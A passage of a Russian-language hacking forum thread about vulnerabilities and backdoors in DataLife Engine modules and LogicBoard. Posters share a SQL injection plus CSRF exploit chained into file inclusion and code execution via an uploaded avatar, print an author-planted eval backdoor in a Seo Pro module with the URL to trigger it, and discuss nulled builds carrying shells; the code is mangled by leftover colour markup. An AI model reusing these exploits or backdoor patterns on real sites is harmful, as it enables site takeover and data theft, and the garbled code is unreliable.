HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #251  
Старый 15.12.2011, 20:15
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Datax - пиздобол

engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись

и скули здесь нет, только ошибка, от неё единственная польза префикс к базе
 
Ответить с цитированием

  #252  
Старый 15.12.2011, 20:18
lansia1
Guest
Сообщений: n/a
Провел на форуме:
6312

Репутация: 0
По умолчанию

Цитата:
Сообщение от chekist  
chekist said:
Datax - пиздобол
engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись
и скули здесь нет, только ошибка, от неё единственная польза префикс к базе
Фигово(((
 
Ответить с цитированием

  #253  
Старый 16.12.2011, 13:26
DarkMaster
Новичок
Регистрация: 17.04.2010
Сообщений: 0
Провел на форуме:
194

Репутация: 0
По умолчанию

Цитата:
Сообщение от chekist  
chekist said:
Datax - пиздобол
engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись
и скули здесь нет, только ошибка, от неё единственная польза префикс к базе
Мне жаль вас разочаровывать, но вы жестоко не правы.

Просто читать надо внимательно - jprof.jpeg это бекдор, который вложили в одну из нуллед-версий. В оригинале он действительно отсутствует. Но этот нуллед успел разойтись по инету и сайты с ним есть...
 
Ответить с цитированием

  #254  
Старый 16.12.2011, 16:59
Datax
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от chekist  
chekist said:
Datax - пиздобол
engine/skins/images/jprof.jpeg залито через фтп, добавлен htaccess чтобы jpeg обрабатывался как пхп, никакие htaccess в папке uploads не удолялись
и скули здесь нет, только ошибка, от неё единственная польза префикс к базе
Пиздабола увидишь в зеркале.

Я скинул обзор не доработок ,в данном движке.

Хорошие баги в привате ,которые тебе не увидеть как своих ушей.
 
Ответить с цитированием

  #255  
Старый 17.12.2011, 01:52
extrimportal
Guest
Сообщений: n/a
Провел на форуме:
27755

Репутация: 0
По умолчанию

Цитата:
Сообщение от Datax  
Datax said:
Хорошие баги в привате ,которые тебе не увидеть как своих ушей.
Врятли кто нибудь может судить, кто какие баги знает, а на счет привата, вы ошибаетесь если думаете что там куева туча дыр, с помощью которых можно поломать пол мира.

Цитата:
Сообщение от DarkMaster  
DarkMaster said:
Но этот нуллед успел разойтись по инету и сайты с ним есть...
Есть так же как и другие нуллы, прям с шеллами а не токо с бекдорами. Тот самый дяденька, или просто его софт "модуль Переходы" был замечен с бекдором зашитым в его же файл, с помощью которого можно было удалить хтацес, и отослать логин и пароль админу. А этот модуль разлетелся вообще по всему инету. Тем более, думаете откуда у его разраба 210 тиц? )) Каждый крутится как может.

Но к большому сожалению таких сайтов так же много как и тех на которых работает бага с lostpassword
 
Ответить с цитированием

  #256  
Старый 17.12.2011, 14:53
DarkMaster
Новичок
Регистрация: 17.04.2010
Сообщений: 0
Провел на форуме:
194

Репутация: 0
По умолчанию

Мысль про бесплатный сыр никто не отменял... Конечно интереснее баги, которые присутствуют в оригинальном движке, а не в левых нуллах, но каждый крутится как может, и одно другому не мешает...

Тысячи контрибов для WP, Джумлы и DLE - вообще поле не паханное... Чего там только нет...
 
Ответить с цитированием

  #257  
Старый 22.12.2011, 21:23
romagaisin
Guest
Сообщений: n/a
Провел на форуме:
4864

Репутация: 0
По умолчанию

может кто скажет как снести htaccess в девятки
 
Ответить с цитированием

  #258  
Старый 26.12.2011, 11:04
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Уязвимость в модуле DLE Multi Lang 1.0

Есть SQL inj в админке, engine\inc\multilang.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]} elseif([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"addi"[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$alt_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alt_name'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$skin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO dle_multilang(name, alt_name, skin) VALUES ('[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$alt_name[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$skin[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
Но сама по себе она почти бесполезна, я нашел для нее более интересное применение Поскольку в админке модуля защита от CSRF не предусмотрена, то пользуемся таким сплойтом, его можно например засунуть в инфрейм своего сайта и скинуть в пм админу.

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/
COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]forms[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"form"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]submit[/COLOR][COLOR="#007700"]();

[/
COLOR][COLOR="#0000BB"]

[/
COLOR]

[/
COLOR
Теперь смотрим дальше, код с engine\modules\multilang.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]])) {

[/
COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM dle_multilang ORDER by id DESC"[/COLOR][COLOR="#007700"]);

while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#0000BB"]$skin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$alt_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'alt_name'[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$alt_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {

[/
COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'langs'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$skin[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"];

include_once[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/language/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'langs'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'/website.lng'[/COLOR][COLOR="#007700"];

}

}

}

[/
COLOR][/COLOR
т.е. тут беруться те данные которые мы чуть раньше добавили в админку и инклудяться, например

Код:
Code:
http://site.ru/?lang=evil
так мы получим инкуд файла test.txt, для проведения атаки можно заререгать пользователя и залить аватар с нашим php кодом, после чего также проинклудить его
 
Ответить с цитированием

  #259  
Старый 31.12.2011, 17:34
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Неофициальный модуль Seo Pro 3.0

Описание:выполнение произвольного кода (бекдор от автора)

Файл: /engine/ajax/seo_info.php

Уязвимый код:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

}else{

[/
COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/engine/classes/mysql.class.php"[/COLOR][COLOR="#007700"]);

if([/
COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])){ @require([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"mysql.class.php - ok
"
[/COLOR][COLOR="#007700"];}

[/
COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/engine/data/dbconfig.php"[/COLOR][COLOR="#007700"]);

if([/
COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])){ @require([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"dbconfig.php - ok
"
[/COLOR][COLOR="#007700"];}

[/
COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/engine/data/config.php"[/COLOR][COLOR="#007700"]);

if([/
COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])){ @require([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"config.php - ok
"
[/COLOR][COLOR="#007700"];}

eval([/
COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]));

echo

[/COLOR][COLOR="#007700"]HTML;

if([/
COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){eval([/COLOR][COLOR="#0000BB"]stripcslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text'[/COLOR][COLOR="#007700"]]));

...

[/
COLOR][/COLOR
Для использования достаточно зайти на

Код:
Code:
http://127.0.0.1/dle/engine/ajax/seo_info.php?wert=evil
после чего должна появиться форма способная выполнять ваш php код
 
Ответить с цитированием

  #260  
Старый 08.01.2012, 23:41
Alex$09
Новичок
Регистрация: 01.10.2009
Сообщений: 27
Провел на форуме:
52963

Репутация: -2
По умолчанию

недавно лазил по коду LogicBoard (DLE Edition) 2.1 наткнулся на:

Цитата:
Сообщение от None  
\upload_forum\components\global\functions.php
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'JHByYXZBdnRvdGE9IjxhIGhyZWY9XCJodHRwOi8vbG9naWNib2FyZC5ydS9cIiB0YXJnZXQ9XCJibGFua1wiPkxvZ2ljQm9hcmQ8L2E+Ijs='[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR
Расшифрованый:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$pravAvtota[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"LogicBoard"[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
Цитата:
Сообщение от None  
\upload_forum\components\class\templates.php
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval([/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'DQogICAgICAgICR0aGlzLT5jb3B5X3 RlbXBsYXRlID0gc3RyX3JlcGxhY2UoICRmaW5kLCAkcmVwbGFj ZSwgJHRoaXMtPmNvcHlfdGVtcGxhdGUgKTsNCiAgICAgICAgDQ ogICAgICAgIGlmICgkdHBsID09ICJnbG9iYWxfdGVtcGxhdGUi IEFORCAoKCRjYWNoZV9jb25maWdbJ2dlbmVyYWxfY2xvc2UnXV snY29uZl92YWx1ZSddIEFORCAkY2FjaGVfZ3JvdXBbJG1lbWJl cl9pZFsndXNlcl9ncm91cCddXVsnZ19zaG93X2Nsb3NlX2YnXS A9PSAxKSBPUiAhJGNhY2hlX2NvbmZpZ1snZ2VuZXJhbF9jbG9z ZSddWydjb25mX3ZhbHVlJ10pKQ0KICAgICAgICB7DQogICAgIC AgICAgICBpZiAoJHByYXZBdnRvdGEgIT0gIjxhIGhyZWY9XCJo dHRwOi8vbG9naWNib2FyZC5ydS9cIiB0YXJnZXQ9XCJibGFua1 wiPkxvZ2ljQm9hcmQ8L2E+IikNCiAgICAgICAgICAgICAgICBl eGl0ICgiUmV0dXJuIHRoZSBjb3B5cmlnaHQgTG9naWNCb2FyZD IhIik7DQogICAgICAgICAgICANCiAgICAgICAgICAgIGlmICgh cHJlZ19tYXRjaCgiI3tjb3B5cmlnaHR9IyIsICR0aGlzLT5jb3 B5X3RlbXBsYXRlKSkNCiAgICAgICAgICAgICAgICBleGl0ICgi UmV0dXJuIHRoZSBjb3B5cmlnaHQgTG9naWNCb2FyZDMhIik7DQ ogICAgICAgICAgICBlbHNlDQogICAgICAgICAgICAgICAgJHRo aXMtPmNvcHlfdGVtcGxhdGUgPSBzdHJfcmVwbGFjZSggIntjb3 B5cmlnaHR9IiwgJHByYXZBdnRvdGEsICR0aGlzLT5jb3B5X3Rl bXBsYXRlICk7DQoJCX0NCiAgICAgICAgDQogICAgICAgIGlmKC Bpc3NldCggJHRoaXMtPnJlc3VsdFskdHBsXSApICkNCgkJCSR0 aGlzLT5yZXN1bHRbJHRwbF0gLj0gJHRoaXMtPmNvcHlfdGVtcG xhdGU7DQoJCWVsc2UNCgkJCSR0aGlzLT5yZXN1bHRbJHRwbF0g PSAkdGhpcy0+Y29weV90ZW1wbGF0ZTsNCiAgICAgICAg'[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR
Расшифрованый:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$find[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$replace[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"]);



if
([/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"global_template"[/COLOR][COLOR="#007700"]AND (([/COLOR][COLOR="#0000BB"]$cache_config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'general_close'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'conf_value'[/COLOR][COLOR="#007700"]] AND[/COLOR][COLOR="#0000BB"]$cache_group[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$member_id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_group'[/COLOR][COLOR="#007700"]]][[/COLOR][COLOR="#DD0000"]'g_show_close_f'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) OR ![/COLOR][COLOR="#0000BB"]$cache_config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'general_close'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'conf_value'[/COLOR][COLOR="#007700"]]))

{

if
([/COLOR][COLOR="#0000BB"]$pravAvtota[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]"LogicBoard"[/COLOR][COLOR="#007700"])

exit
([/COLOR][COLOR="#DD0000"]"Return the copyright LogicBoard2!"[/COLOR][COLOR="#007700"]);



if
(![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"#{copyright}#"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"]))

exit
([/COLOR][COLOR="#DD0000"]"Return the copyright LogicBoard3!"[/COLOR][COLOR="#007700"]);

else

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{copyright}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pravAvtota[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"]);

}



if
( isset([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]] ) )

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]] .=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"];

else

[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
Как-нибуть заюзать можно?

А еще смущяет запрос:

Код:
Code:
$db->query( "INSERT INTO " . LB_DB_PREFIX . "_members_online SET mo_id = '{$onl_session}', mo_member_id = '{$member_id['user_id']}', mo_member_name = '{$member_id['name']}', mo_member_group = '{$member_id['user_group']}', mo_ip = '{$_IP}', mo_date = '{$_TIME}', mo_browser = '{$onl_browser}', mo_location = '{$onl_location}', mo_loc_do = '', mo_loc_op = '', mo_loc_id = '', mo_hide = '{$mo_hide}'" );
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ